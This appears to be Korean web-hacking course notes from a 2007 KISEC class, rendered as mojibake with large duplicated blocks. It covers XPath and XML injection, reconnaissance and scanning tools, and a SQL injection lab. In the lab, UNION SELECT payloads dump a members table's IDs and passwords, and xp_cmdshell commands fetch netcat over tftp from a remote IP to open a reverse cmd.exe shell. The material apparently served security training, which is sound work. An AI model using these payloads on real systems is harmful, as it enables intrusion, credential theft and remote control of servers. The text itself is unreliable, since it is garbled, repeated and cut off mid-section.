๋ฃจํธ ์๋ฆฌ๋จผํธ ๋ฌธ์๋ด ๋ชจ๋ ์๋ฆฌ๋จผํธ์ ๋ด์ฉ์ ํฌํจํ๊ณ ์๋ XML ๋ฌธ์์ ์๋ฆฌ๋จผํธ
์์ฑ ์๋ฆฌ๋จผํธ์ ํฌํจ๋์ด ์ถ๊ฐ์ ์ธ ์ ๋ณด๋ฅผ ์ ๊ณต
ltimg src=balbalbalgtbalbalballtimggt
์ํฐํฐ ํ ์คํธ ๋ฐ์ด๋๋ฆฌ๋ฐ์ดํฐ ๋น ์์คํฌ ๋ฌธ์๋ฅผ ์ ์ฅํ๋๋ฐ ์ฌ์ฉ
์ฒ๋ฆฌ๋ช ๋ น ์ ์ฒด ๋ฌธ์๋ ๋ฌธ์์ ์ผ๋ถ๋ฅผ ์ฒ๋ฆฌํ๋ ์์ฉํ๋ก๊ทธ๋จ๊ณผ ์ฐ๊ฒฐํด ์ฃผ๋ ๋ช ๋ น์ด lt gt
์ฃผ์ XML ํ๋ก์ธ์๊ฐ ํด์ํ์ง ์๋ ์ค๋ช ๋ฌธ
lt-- --gt
CDATA์น์ ํน์ํ ๋ฌธ์๋ฅผ ์ผ๋ฐ ํ ์คํธ๋ก ์ธ์ํ๋๋ก ํ๋ ํ๊ธฐ๋ฒ
lt[CDATA[hellipstring]]gt
Xpath
Xml ๋ฌธ์์ ๋ํ ์ง์์ถ์ด
SQL๋ฌธ์ ํน์ ํ ์ด๋ธ์ ํ๊ณผ ์ด์ ์ ํ
Xpath๋ ํน์ XML๋ฌธ์์ ๋ ธ๋์ ๋ ธ๋์ ์ ์ ํ
๊ด๋ ฆ Issue
์)bookbook[ISBN=1111 or 1=1]
๋ชจ๋ book ๋ ธ๋๋ค์ ์ ๊ทบ๊ฐ๋ฅ
Xpath๊ณต๊ฒฉ
๋ํ ํ์ด๋ก๋ ๊ณต๊ฒฉ(like DOS)
XML์ ๋ ธ๋์ ์์ฑ์ด ์ค์ฒฉ ์ ์ถ๋ ์ ์๋ค๋ ์ ์ ์ ์ฉ
ํน์ ๋ ธ๋์์ ๋์ผ ๋ ธ๋๋ช ๋ฐ๋ณต์ ์ถ์์ฑ ๋ฌดํ์ ์ถ
์ฌ๊ท ํ์ด๋ก๋ ๊ณต๊ฒฉ
`or loginid(nodeLoginID())=LoginID or a=b
07๋ ํดํน๋ฐฉ์ด๋ํ๋ฌธ์
WebService
์ ์๋คํธ์ํฌ์์์ ์ ๊ทบ ๊ฐ๋ฅํ ์ํํธ์จ์ด ๊ธฐ๋ฅ๋จ์๋ก ํ๋ซํผ ํ๋ก๊ทธ๋๋ฐ ์ถ์ด ๋ฐ ์ปดํฌ๋ํธ ๋ชจ๋ธ์ ๋
๋ฆฝ์ ์ธ ๊ธฐ์ ๋ก ๋ง๋ค์ด์ง ์ํํธ์จ์ด
์น ํดํน ๊ณต๊ฒฉ ์ ์ฐจ
FootPrinting Scanning Enumeration
PllferingEscalatingPrivledge
GainingAccess
CreatingBack Doors
CoveringTracks
Web Hacking 2์ผ์ฐจ
2007๋ 10์ 23์ผ ํ์์ผ
์ค์ 934
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 9
์น ํดํน ๊ณต๊ฒฉ ์ ์ฐจ
FootPrinting Scanning Enumeration
PllferingEscalatingPrivledge
GainingAccess
CreatingBack Doors
CoveringTracks
๊ณต๊ฒฉ์ ์ฐจ
์ ๋ณด์์ง
Profiling
๋ถ์
Analysis
๊ณต๊ฒฉ
AttackEcploit
hellip
์ฌํ๊ณตํ
๊ฒ์์์ง
FootPrinting
PortScan
Web Site ๋ฏธ๋ฌ๋ง
Web ๊ตฌ์กฐ๋ถ์
์๋ฏธ์๋ ์ ๋ณด๋ก ๊ฐ๊ณต
Account ์์ง
OS์ ๋ณด์ทจ์ฝ์
ํฌํธ๋ณ์๋น์ค์ทจ์ฝ์
์ ์ฒด๊ตฌ์กฐ์์ค์ฃผ์
์ฟ ํค๋ฑ ๋ถ์
์ ๋ณด์ ๊ทบ๊ฑฐํ ๊ณต๊ฒฉ
BF Guessing
OSNetwork Service
Exploitation
๊ถํ์์น
OWASPWASC๋ฑ์ ์ํ ๊ณต๊ฒฉ
๋ณด๊ณ ์
1์ ๋ณด์์ง
์ฌํ๊ณตํ
๋๋ฉ์ธ ์ ๋ณด IP Block ์ ๋ณด
Whois
Dig
Whosip
Netcraft
๊ธฐ๋ณธ์ ๋ณด
httpwebarchiveorg
Google Cache
Web Archive
httpjohnnyihackstuffcom
์ฌ์ ์ฌ(googledorkpdf)
Google Dork
Google hacking DB ์ฌ์ฉ
Google API Key(ํค ๋ฐ๊ธ ํ์ง)
SiteDigger Wikto
๊ฒ์์์ง(No-Tech Hacking)
๊ตฌ๊ธ ํดํน ํค์๋ ์ ๊ณต ์ฌ์ดํธ
Footprinting Web Server
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 10
AFD(Acitive Filter Detection)
ICMP TTL๊ฐ์ ์กฐ์ ํด๊ฐ๋ฉฐ ์น ์๋ฒ ํ์ง
netcraftcom
Stealth Scan-sS
Normal Scan-sT-sU
Network Services Version Scan-sV
OSDetection-O-A
DoNotPing_P0
Idle scan
IDS์ฐํ
httpunicornscanorg
Unicorn scan -mT -p -v -r 2501921681024q
Unicornscan
Nc
jikto
Port Scan(Port Mapping)
httTrack
Web Site Mirroring
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 11
-grepegrep awksedsortuniq(moreheadless)๋ฑ ํ์ฉ
Mirroring ํ ์ ์ ๋ถ์
balckwindow
InteliTamper
Wikto
Web๊ตฌ์กฐ ๋ถ์(๋ฐ์๋)
Httpwatch
TamperlE
Cooxie
LiveHttpHeaders(firefox)
Command line tool(nccurlopenssl)
Manual Analysis
ParosWebscrabFidderBurpIntruder
SoftwareProxy
Web๊ตฌ์กฐ๋ถ์(์์์ )
๊ด๋ฆฌ์ํ์ด์ง
์๋ฃ์ค(web shell)
ํต๊ณ ์ํ ํ์ด์ง
ํ์๋ฑ๋ก์ฐํธ๋ฒํธ ์กฐํ(์ธ์ ์ ๊ณต๊ฒฉ)
(์ธ์ ์ ์ ์ ๋ ฅ๊ฐ์ ๋ฃ์์๋ ๊ฒฐ๊ณผ๋ฅผ ๋ฟ๋ ค์ฃผ๋ ํ์ด์ง๋ฅผ ์ฐพ์์ผํ๋ค)์๋ณด์ฌ์ฃผ๋๊ฑด ๋ธ๋ผ์ธ๋ ์ธ์ ์
์ํธ๋ถ์ค(์ํธ ํ๋ ์์)
์ ๋ณด์์ (์ํ์์ง์์น๊ธฐํ)
ํ์๊ฐ์ ํ์ด์ง
๊ฒฐ์ ํ์ด์ง
Basic Banner Garbbing
Http resonse ํค๋ ์์
Http resonse ํค๋ ์กด์ฌ ์ ๋ฌด
Http resonse ํค๋์ ํน์ ๊ฐ
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 12
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
Unexpercted Method ์ ์ก
๋์ผ์์ฒญ ๋ฐ๋ณต ์ ์ก
์ทจ์ฝ์ ์ค์บ(system)
Xscan
Nessus
n-stealth security scanner
์ทจ์ฝ์ ์ค์บ(Web Server amp WAS amp Web App)
APP SCANNER
ACUNETIX
NSTALKER SCANNER
์ค์บ ISSUE
BASIC DIGEST NTML CERT
FORM-BASED
์ธ์ฆ์ ๋ณด ์ค์
์ค์บ ๊ฐ๋(๋ฉํฐ ์ปค๋ฅ์ ํ์์์ ๊ณต๊ฒฉ๋ชจ๋๋น๊ณต๊ฒฉ๋ชจ๋)
๋ถ์
์๋ฏธ์๋ ์ ๋ณด๋ก ๊ฐ๊ณต
ACCOUNT ์์ง
OS์ ๋ณด์ ๋ฐ๋ฅธ ์ทจ์ฝ์ ์์ง
ํฌํธ๋ณ ์๋น์ค ์ทจ์ฝ์
์น์๋ฒ ์ ์ฒด๊ตฌ์กฐ ๋ถ์
์ฃผ์
ํ๋ ํ๋
์์ค๋ถ์
์ฟ ํค๋ถ์
์ธ์ ID์์ฑ ์ทจ์ฝ์ ๋ถ์
๊ณต๊ฒฉ
์ ๋ณด์ ๊ทบ๊ฑฐํ ๊ณต๊ฒฉ
๋ฌด์์ ๊ณต๊ฒฉ
์ฌ์ ๊ณต๊ฒฉ
๊ณต๊ฒฉ์ด์
์์ง๋ ACCOUNT ์ ๋ณด๋ฅผ์ด์ฉ
OSNETWORK SERVICE ๊ณต๊ฒฉ
WEBSERVER WEBAPP SERVER WEBAPPLICATION
SQLISCANNER
๊ถํ ์์น
์ํ
ํ์์ ๋ณด ์์
Cookie Stealing
CSRF
์์ง
CSRF
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 13
์ ์ ์กฐ๊ฑด์ ๋ด๋ถ๋ง์ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋ ์๊ณ ์์ ๊ฒฝ์ฐ
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
OWASPWASC
์์์
์น ์ดํ๋ฆฌ์ผ์ด์ ์ทจ์ฝ์ ๊ณต๊ฒฉ
์ํ๋์ ๋ฐ๋ผ ๊ณต๊ฒฉ
๊ฐ์ฉ์ฑ์ ๋จ์ดํธ๋ฆฌ๋ ๊ณต๊ฒฉ์ ์ธ
์๋ฒ์ shellํ๋ or๊ด๋ฆฌ์ ์ํธ ํ๋
๋ฐ์ดํฐ ์ด๋ ํ์ฉ๊ธ์ง
Ethical Hacking์ธ ๊ฒฝ์ฐ ๊ณ ๊ฐ์ ์๊ตฌ์ฌํญ ๋ฐ์
์คํ์ ๊ฑฐ
์น ์ทจ์ฝ์ ์ค์บ๋ ๊ฒฐ๊ณผ ๋ถ์
ONE WAY WEB HACKING ์ฝ์ด๋ณด๊ธฐ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 14
SQL INJECTION
GETPOST ํ๋ผ๋ฏธํฐ HTTP REQUEST ํ๋ผ๋ฏธํฐ ์ฟ ํค ๊ฐ
๊ธฐํ ์๋ฒ์์ ์ฒ๋ฆฌํ๋ ๋ชจ๋ ํด๋ผ์ด์ถํธ ๊ฐ
ํด๋ผ์ด์ถํธ ์ ๋ ฅ ๊ฐ ์ ํ
ํด๋ผ์ด์ถํธ์์ ์ ๋ ฅ๋ ๊ฐ์ด ์ ํจ์ฑ ๊ฒ์ฆ๊ณผ์ ์์ด sql ๋ฌธ์ ํฌํจ๋๋ ๊ฒฝ์ฐ
MAIN CAUSE
Impact
์ธ์ฆ์ฐํ
๋ฐ์ดํฐ๋ฒ ์ด์ค ๋คํ ์กฐ์ ์์ฑ ํ๊ดด
DML D์ด ๋ฑ ์์ํ ์ ์๋ ๋ชจ๋ ์์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ปจํธ๋กค
์์คํ ๋ช ๋ น์ด ์คํ
COUNTERMEASURE
์ ๋ ฅ๊ฐ ๊ฒ์ฆ
์ต์๊ถํ ๋ถ์ฌ(SYSTEMDBMSDatabase)
์ธ์ฆ์ฐํ
์ธ๊ฐ๋ ์ฌ์ฉ์์ ID PW ๋ฅผ ์ ๋ ฅํ์ง ์๊ณ ๋ ์ธ์ฆ์ ์ฐํํ๋ ํ์
ID PW๋ฅผ ๋ชจ๋ฅด๋ ์ํ์์๋ ์ ์ ํ ๊ตฌ์ฑ๋ ๋ฌธ์์ด์ ์ ๋ ฅํ์ฌ ์ธ์ฆ์ ์ฐํํ๋ ๊ฒ์ด ๊ฐ๋ฅ
์ ๋ ฅ๋ ๋ฌธ์์ด์ SQL ๋ฌธ์ ์ผ๋ถ๋ก ์ฝ์ ์ด ๋์ด ์คํ๋จ
์ธ์ฆ ์ฐํ์ ์ฌ์ฉ๋๋ ์ ๋ ฅ๊ฐ์
๋ฌธ๋ฒ์ ์ค๋ฅ๋ฅผ ์ํค์ง ์์์ผ ํจ
WHERE์ ์ ์กฐ๊ฑด์ด ํญ์ ์ฐธ์ด ๋๋๋ก ์กฐ์
์น ์ ํ๋ฆฌ์ผ์ด์ ์ ์ผ๋ฐ์ ์ธ ์ธ์ฆ ์ ์ฐจ
1IDPW ์ ๋ ฅ
2SQL Query ์์ฑ
3DATABASE์ ์ฟผ๋ฆฌ ์ ์ก
4DATABASE์์ ์ฟผ๋ฆฌ๋ฌธ ์คํ
5๋ฐํ๋๋ RETURN๊ฐ์ ๋ฐ๋ผ ์ธ์ฆ์ฌ๋ถํ๋จ
SQL INJECTION ์ ์ฐจ
DB ์คํค๋งํ์ (DBTABLECOLUMN ํ๊ฒฝ์ ๋ณด๋ฑ ํ์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ด๋ฆ ํ์
ํ ์ด๋ธ์ด๋ฆ ํ์
์ปฌ๋ผ์ด๋ฆ ํ์
๋ชจ๋ SQL INJECTION์ ์ ๋ ฅ๊ฐ์ ๋ํ ์ ํจ์ฑ ๊ฒ์ฆ์ ํ์ง ์๊ธฐ ๋๋ฌธ์ ๋ฐ์ํ๋ค ์๋ฌ๋ฅผ ์ ๋ํ์ฌ ํ๋์ ์ ๋ณด๋ฅผ ๋์ถ์ํจ๋ค
DBMS ๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ๋ ์ง์คํธ๋ฆฌ์ ์ ๊ทบํ๋ ๊ฒ์ด ๊ฐ๋ฅ
DBMS๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ์ฟผ๋ฆฌ๋ฅผ ํตํ ์๋น์ค ์ ์ด๊ฐ ๊ฐ๋ฅ
OYES MALL (SQL INJECTION์ ์ด์ฉํ ๊ด๋ฆฌ์ ๊ถํ ํ๋ ์ค์ต
ํ๊ฒฝ์(2000ASPMS-SQL2000)
์ค๋น๋ ์ผํ๋ชฐ์ด๋ค
์ฒซ๋ฒ์งธ ๋ฐฉ๋ฒ
Web Hacking 3์ผ์ฐจ
2007๋ 10์ 25์ผ ๋ชฉ์์ผ
์ค์ 1200
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 15
group by(user_id) -- ๋ฅผ ์ด์ฉํด ํ ์ด๋ธ์ ์์๋ธ๋ค
Member ํ ์ด๋ธ์์์๋ num์ด๋ผ๋ ์ปฌ๋ผ์ ํ ํด๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 16
union select from members where user_id like o ํด๋ด๋ผ ๋ก๊ทธ์ธ ๋ ๊ฑฐ๋ค
๋๋ฒ์งธ ๋ฐฉ๋ฒ
์ฃผ์๋ก์กฐํ ๋ถ๋ถ์ SQL INJECTION์ ํ์๋ค
$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์๊ฐ์ด ์ง์๋ฅผ ํ๋ฉด ํ ํด๋ธ๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 17
์ฐ๋ฆฌ๋ members ๋ผ๋ ํ ์ด๋ธ์ด ์กด์ฌํ๋ ๊ฒ์ ๋ณผ์ ์์ ๊ฒ์ด๋ค
$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --
Members์ ๋ํ ์ปฌ๋ผ์ ํ ํด๋ธ๋ค
$ or 1=(select top 1 user_id from members)--
User id์ ์ปฌ๋ผ์ top 1 ์ธ๊ฒ์ ํ ํด๋ธ๋ค
union select 1234 user_idpasswd from members where user_id=oyes --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 18
์ผ์~password ๊ฐ oyesmall ์ด๋ผ๋ค ์ค์ต ๋
File Uploading
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --
$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --
์์ฃผ ๊ฐ๋จํ๋ค
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 19
๋ค์๊ณผ ๊ฐ์ด ์ค์ ์ ์กฐ๊ธ ๋ณ๊ฒฝ ์์ผ์ค๋ค
๋ค์๊ณผ ๊ฐ์ด ์ ํ ์ ํด๋๋ค
๊ทธ๋ผ ๋ค์๊ณผ ๊ฐ์ด ๋ก๊ทธ์ธ์ด ๋๋ ์ฅ๋ฉด์ ๋ณผ ์ ์์ ๊ฒ์ด๋ค
์ฌ๊ธฐ์๋ XSS๋ฅผ ์ฌ์ฉํ์ง ์๊ณ Network์์์ Cookie๊ฐ์ ํ์ณ์ ๊ณ์ ์ ํ์ณ ๋ณด์๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 8
XML ํน์ง
๋ฌธ์์ ๋ด์ฉ๊ณผ ๋์์ธ์ด ์์ ํ ๋ถ๋ฆฌ
๋ฌธ์๊ตฌ์กฐ๋ XML๋ก ํ๋ฆฌ์ ํ ์ด์ ์ XSL์ ํตํด
๋ค์ํ ๋ฐฉ์์ ๋งํฌ ๊ธฐ๋ฅ ์ ๊ณต
ํ์คํ๋ DTD์ ํตํด ๋ชจ๋ ๋ถ์ผ์ ์ฌ์ฉ๊ฐ๋ฅ
DOM(Document Object Model)
SAX(Simple API for XML)
XML๊ตฌ์กฐ2๊ฐ์ง ๋ํ์ ๋ชจ๋ธ์กด์ฌ
๊ตฌ์ฑ์์ ์ค๋ช
์๋ฆฌ๋จผํธ ๋งํฌ์ ํ๊ทธ์ ๊ทธ ์์ ํฌํจ๋ ๋ด์ฉ
๋น ์๋ฆฌ๋จผํธ ๋ด์ฉ์ ํฌํจํ์ง ์๋ ๋น ์๋ฆฌ๋จผํธ
๋ฃจํธ ์๋ฆฌ๋จผํธ ๋ฌธ์๋ด ๋ชจ๋ ์๋ฆฌ๋จผํธ์ ๋ด์ฉ์ ํฌํจํ๊ณ ์๋ XML ๋ฌธ์์ ์๋ฆฌ๋จผํธ
์์ฑ ์๋ฆฌ๋จผํธ์ ํฌํจ๋์ด ์ถ๊ฐ์ ์ธ ์ ๋ณด๋ฅผ ์ ๊ณต
ltimg src=balbalbalgtbalbalballtimggt
์ํฐํฐ ํ ์คํธ ๋ฐ์ด๋๋ฆฌ๋ฐ์ดํฐ ๋น ์์คํฌ ๋ฌธ์๋ฅผ ์ ์ฅํ๋๋ฐ ์ฌ์ฉ
์ฒ๋ฆฌ๋ช ๋ น ์ ์ฒด ๋ฌธ์๋ ๋ฌธ์์ ์ผ๋ถ๋ฅผ ์ฒ๋ฆฌํ๋ ์์ฉํ๋ก๊ทธ๋จ๊ณผ ์ฐ๊ฒฐํด ์ฃผ๋ ๋ช ๋ น์ด lt gt
์ฃผ์ XML ํ๋ก์ธ์๊ฐ ํด์ํ์ง ์๋ ์ค๋ช ๋ฌธ
lt-- --gt
CDATA์น์ ํน์ํ ๋ฌธ์๋ฅผ ์ผ๋ฐ ํ ์คํธ๋ก ์ธ์ํ๋๋ก ํ๋ ํ๊ธฐ๋ฒ
lt[CDATA[hellipstring]]gt
Xpath
Xml ๋ฌธ์์ ๋ํ ์ง์์ถ์ด
SQL๋ฌธ์ ํน์ ํ ์ด๋ธ์ ํ๊ณผ ์ด์ ์ ํ
Xpath๋ ํน์ XML๋ฌธ์์ ๋ ธ๋์ ๋ ธ๋์ ์ ์ ํ
๊ด๋ ฆ Issue
์)bookbook[ISBN=1111 or 1=1]
๋ชจ๋ book ๋ ธ๋๋ค์ ์ ๊ทบ๊ฐ๋ฅ
Xpath๊ณต๊ฒฉ
๋ํ ํ์ด๋ก๋ ๊ณต๊ฒฉ(like DOS)
XML์ ๋ ธ๋์ ์์ฑ์ด ์ค์ฒฉ ์ ์ถ๋ ์ ์๋ค๋ ์ ์ ์ ์ฉ
ํน์ ๋ ธ๋์์ ๋์ผ ๋ ธ๋๋ช ๋ฐ๋ณต์ ์ถ์์ฑ ๋ฌดํ์ ์ถ
์ฌ๊ท ํ์ด๋ก๋ ๊ณต๊ฒฉ
`or loginid(nodeLoginID())=LoginID or a=b
07๋ ํดํน๋ฐฉ์ด๋ํ๋ฌธ์
WebService
์ ์๋คํธ์ํฌ์์์ ์ ๊ทบ ๊ฐ๋ฅํ ์ํํธ์จ์ด ๊ธฐ๋ฅ๋จ์๋ก ํ๋ซํผ ํ๋ก๊ทธ๋๋ฐ ์ถ์ด ๋ฐ ์ปดํฌ๋ํธ ๋ชจ๋ธ์ ๋
๋ฆฝ์ ์ธ ๊ธฐ์ ๋ก ๋ง๋ค์ด์ง ์ํํธ์จ์ด
์น ํดํน ๊ณต๊ฒฉ ์ ์ฐจ
FootPrinting Scanning Enumeration
PllferingEscalatingPrivledge
GainingAccess
CreatingBack Doors
CoveringTracks
Web Hacking 2์ผ์ฐจ
2007๋ 10์ 23์ผ ํ์์ผ
์ค์ 934
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 9
์น ํดํน ๊ณต๊ฒฉ ์ ์ฐจ
FootPrinting Scanning Enumeration
PllferingEscalatingPrivledge
GainingAccess
CreatingBack Doors
CoveringTracks
๊ณต๊ฒฉ์ ์ฐจ
์ ๋ณด์์ง
Profiling
๋ถ์
Analysis
๊ณต๊ฒฉ
AttackEcploit
hellip
์ฌํ๊ณตํ
๊ฒ์์์ง
FootPrinting
PortScan
Web Site ๋ฏธ๋ฌ๋ง
Web ๊ตฌ์กฐ๋ถ์
์๋ฏธ์๋ ์ ๋ณด๋ก ๊ฐ๊ณต
Account ์์ง
OS์ ๋ณด์ทจ์ฝ์
ํฌํธ๋ณ์๋น์ค์ทจ์ฝ์
์ ์ฒด๊ตฌ์กฐ์์ค์ฃผ์
์ฟ ํค๋ฑ ๋ถ์
์ ๋ณด์ ๊ทบ๊ฑฐํ ๊ณต๊ฒฉ
BF Guessing
OSNetwork Service
Exploitation
๊ถํ์์น
OWASPWASC๋ฑ์ ์ํ ๊ณต๊ฒฉ
๋ณด๊ณ ์
1์ ๋ณด์์ง
์ฌํ๊ณตํ
๋๋ฉ์ธ ์ ๋ณด IP Block ์ ๋ณด
Whois
Dig
Whosip
Netcraft
๊ธฐ๋ณธ์ ๋ณด
httpwebarchiveorg
Google Cache
Web Archive
httpjohnnyihackstuffcom
์ฌ์ ์ฌ(googledorkpdf)
Google Dork
Google hacking DB ์ฌ์ฉ
Google API Key(ํค ๋ฐ๊ธ ํ์ง)
SiteDigger Wikto
๊ฒ์์์ง(No-Tech Hacking)
๊ตฌ๊ธ ํดํน ํค์๋ ์ ๊ณต ์ฌ์ดํธ
Footprinting Web Server
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 10
AFD(Acitive Filter Detection)
ICMP TTL๊ฐ์ ์กฐ์ ํด๊ฐ๋ฉฐ ์น ์๋ฒ ํ์ง
netcraftcom
Stealth Scan-sS
Normal Scan-sT-sU
Network Services Version Scan-sV
OSDetection-O-A
DoNotPing_P0
Idle scan
IDS์ฐํ
httpunicornscanorg
Unicorn scan -mT -p -v -r 2501921681024q
Unicornscan
Nc
jikto
Port Scan(Port Mapping)
httTrack
Web Site Mirroring
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 11
-grepegrep awksedsortuniq(moreheadless)๋ฑ ํ์ฉ
Mirroring ํ ์ ์ ๋ถ์
balckwindow
InteliTamper
Wikto
Web๊ตฌ์กฐ ๋ถ์(๋ฐ์๋)
Httpwatch
TamperlE
Cooxie
LiveHttpHeaders(firefox)
Command line tool(nccurlopenssl)
Manual Analysis
ParosWebscrabFidderBurpIntruder
SoftwareProxy
Web๊ตฌ์กฐ๋ถ์(์์์ )
๊ด๋ฆฌ์ํ์ด์ง
์๋ฃ์ค(web shell)
ํต๊ณ ์ํ ํ์ด์ง
ํ์๋ฑ๋ก์ฐํธ๋ฒํธ ์กฐํ(์ธ์ ์ ๊ณต๊ฒฉ)
(์ธ์ ์ ์ ์ ๋ ฅ๊ฐ์ ๋ฃ์์๋ ๊ฒฐ๊ณผ๋ฅผ ๋ฟ๋ ค์ฃผ๋ ํ์ด์ง๋ฅผ ์ฐพ์์ผํ๋ค)์๋ณด์ฌ์ฃผ๋๊ฑด ๋ธ๋ผ์ธ๋ ์ธ์ ์
์ํธ๋ถ์ค(์ํธ ํ๋ ์์)
์ ๋ณด์์ (์ํ์์ง์์น๊ธฐํ)
ํ์๊ฐ์ ํ์ด์ง
๊ฒฐ์ ํ์ด์ง
Basic Banner Garbbing
Http resonse ํค๋ ์์
Http resonse ํค๋ ์กด์ฌ ์ ๋ฌด
Http resonse ํค๋์ ํน์ ๊ฐ
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 12
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
Unexpercted Method ์ ์ก
๋์ผ์์ฒญ ๋ฐ๋ณต ์ ์ก
์ทจ์ฝ์ ์ค์บ(system)
Xscan
Nessus
n-stealth security scanner
์ทจ์ฝ์ ์ค์บ(Web Server amp WAS amp Web App)
APP SCANNER
ACUNETIX
NSTALKER SCANNER
์ค์บ ISSUE
BASIC DIGEST NTML CERT
FORM-BASED
์ธ์ฆ์ ๋ณด ์ค์
์ค์บ ๊ฐ๋(๋ฉํฐ ์ปค๋ฅ์ ํ์์์ ๊ณต๊ฒฉ๋ชจ๋๋น๊ณต๊ฒฉ๋ชจ๋)
๋ถ์
์๋ฏธ์๋ ์ ๋ณด๋ก ๊ฐ๊ณต
ACCOUNT ์์ง
OS์ ๋ณด์ ๋ฐ๋ฅธ ์ทจ์ฝ์ ์์ง
ํฌํธ๋ณ ์๋น์ค ์ทจ์ฝ์
์น์๋ฒ ์ ์ฒด๊ตฌ์กฐ ๋ถ์
์ฃผ์
ํ๋ ํ๋
์์ค๋ถ์
์ฟ ํค๋ถ์
์ธ์ ID์์ฑ ์ทจ์ฝ์ ๋ถ์
๊ณต๊ฒฉ
์ ๋ณด์ ๊ทบ๊ฑฐํ ๊ณต๊ฒฉ
๋ฌด์์ ๊ณต๊ฒฉ
์ฌ์ ๊ณต๊ฒฉ
๊ณต๊ฒฉ์ด์
์์ง๋ ACCOUNT ์ ๋ณด๋ฅผ์ด์ฉ
OSNETWORK SERVICE ๊ณต๊ฒฉ
WEBSERVER WEBAPP SERVER WEBAPPLICATION
SQLISCANNER
๊ถํ ์์น
์ํ
ํ์์ ๋ณด ์์
Cookie Stealing
CSRF
์์ง
CSRF
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 13
์ ์ ์กฐ๊ฑด์ ๋ด๋ถ๋ง์ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋ ์๊ณ ์์ ๊ฒฝ์ฐ
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
OWASPWASC
์์์
์น ์ดํ๋ฆฌ์ผ์ด์ ์ทจ์ฝ์ ๊ณต๊ฒฉ
์ํ๋์ ๋ฐ๋ผ ๊ณต๊ฒฉ
๊ฐ์ฉ์ฑ์ ๋จ์ดํธ๋ฆฌ๋ ๊ณต๊ฒฉ์ ์ธ
์๋ฒ์ shellํ๋ or๊ด๋ฆฌ์ ์ํธ ํ๋
๋ฐ์ดํฐ ์ด๋ ํ์ฉ๊ธ์ง
Ethical Hacking์ธ ๊ฒฝ์ฐ ๊ณ ๊ฐ์ ์๊ตฌ์ฌํญ ๋ฐ์
์คํ์ ๊ฑฐ
์น ์ทจ์ฝ์ ์ค์บ๋ ๊ฒฐ๊ณผ ๋ถ์
ONE WAY WEB HACKING ์ฝ์ด๋ณด๊ธฐ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 14
SQL INJECTION
GETPOST ํ๋ผ๋ฏธํฐ HTTP REQUEST ํ๋ผ๋ฏธํฐ ์ฟ ํค ๊ฐ
๊ธฐํ ์๋ฒ์์ ์ฒ๋ฆฌํ๋ ๋ชจ๋ ํด๋ผ์ด์ถํธ ๊ฐ
ํด๋ผ์ด์ถํธ ์ ๋ ฅ ๊ฐ ์ ํ
ํด๋ผ์ด์ถํธ์์ ์ ๋ ฅ๋ ๊ฐ์ด ์ ํจ์ฑ ๊ฒ์ฆ๊ณผ์ ์์ด sql ๋ฌธ์ ํฌํจ๋๋ ๊ฒฝ์ฐ
MAIN CAUSE
